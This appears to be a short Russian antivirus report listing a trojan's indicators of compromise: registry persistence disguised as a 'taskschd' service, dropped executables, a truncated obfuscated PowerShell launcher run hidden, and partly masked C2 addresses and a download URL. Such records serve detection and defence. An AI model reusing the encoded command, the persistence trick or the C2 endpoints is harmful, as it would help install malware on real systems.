Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\taskschd] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\taskschd] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData0007\taskschd.exe"'
- 'taskschd' "%WINDIR%\SysWOW64\NlsData0007\taskschd.exe"
- 'taskschd' %WINDIR%\SysWOW64\NlsData0007\taskschd.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAG4AZgA3AG4AYgBrAD0AKAAnAEQAZwA1ACcAKwAnAHUAJwArACcAaQBkADYAJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQARQBOAHYAOgB0AEUAbQBQAFwATwBGAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\r5mspzm.exe
- %WINDIR%\syswow64\nlsdata0007\taskschd.exe
- %TEMP%\office2019\r5mspzm.exe в %WINDIR%\syswow64\nlsdata0007\taskschd.exe
- '17#.#4.215.84':80
- '85.##.207.108':8080
- http://ca##yu.id/wp-includes/jSi7Fd1r2wtg64969/
- http://85.##.207.108:8080/FRUnMhOYkC9feFYFhSk/3YIMEnLftIb0OjOaJt/Vh90/kQ6VJuCFpb/gp2e/CvhROnJ/ via 85.##.207.108
- DNS ASK ca##yu.id
- '%TEMP%\office2019\r5mspzm.exe'
- '%WINDIR%\syswow64\nlsdata0007\taskschd.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAG4AZgA3AG4AYgBrAD0AKAAnAEQAZwA1ACcAKwAnAHUAJwArACcAaQBkADYAJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQARQBOAHYAOgB0AEUAbQBQAFwATwBGAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)